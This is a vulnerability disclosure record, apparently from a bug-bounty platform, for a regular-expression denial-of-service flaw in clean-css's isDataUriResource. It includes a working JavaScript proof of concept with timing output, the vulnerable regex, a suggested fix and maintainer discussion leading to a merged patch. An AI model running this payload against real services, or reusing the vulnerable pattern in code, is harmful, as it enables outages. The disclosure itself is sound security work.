Inefficient Regular Expression Complexity in clean-css/clean-css

Valid

Reported on

Sep 12th 2021


✍️ Description

It allows cause a denial of service when calling function isDataUriResource.

🕵️‍♂️ Proof of Concept

// PoC.js
var isDataUriResource = require("clean-css/lib/utils/is-data-uri-resource")

for(var i = 1; i <= 50000; i++) {
   var time = Date.now();
   var attack_str = 'data:' + ';charset=a;'.repeat(i*10000);
   isDataUriResource(attack_str) 
   var time_cost = Date.now() - time;
   console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

💥 The Output

attack_str.length: 110005: 4326 ms
attack_str.length: 220005: 17106 ms
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have contacted a member of the clean-css team and are waiting to hear back 3 months ago
clean-css/clean-css maintainer
3 months ago

Maintainer


Hey folks / @admin - this is clean-css maintainer. I appreciate the security you disclosed, however I want you to comment on few things:

  • clean-css is a quite popular library however in 99.9% percent of cases it's used during a build process, so DoS at that point would result in a longer build process and/or build crash
  • I believe those 0.1% cases affected is when someone provides CSS optimization as a service (we do but it's still done 100% inside a browser) and this may cause DoS and allow someone to escalate privileges etc

Sure we can do a fix, but there's probably countless other cases where this can happen.

Yeting Li
3 months ago

Researcher


Hi​, nice to hear from you. If the CSS optimization is regarded as a service, it is indeed vulnerable to DOS attacks. I am willing to suggest that the maintainers replace the vulnerable regex /^data:(\S*?)?(;charset=[^;]+)?(;[^,]+?)?,(.+)/ with the safe regex /^data:(\S*?)?(;charset=(?:(?!;charset=)[^;])+)?(;[^,]+?)?,(.+)/.

clean-css/clean-css maintainer validated this vulnerability a month ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
clean-css/clean-css maintainer confirmed that a fix has been merged on 3721c6 a month ago
The fix bounty has been dropped
is-data-uri-resource.js#L1 has been validated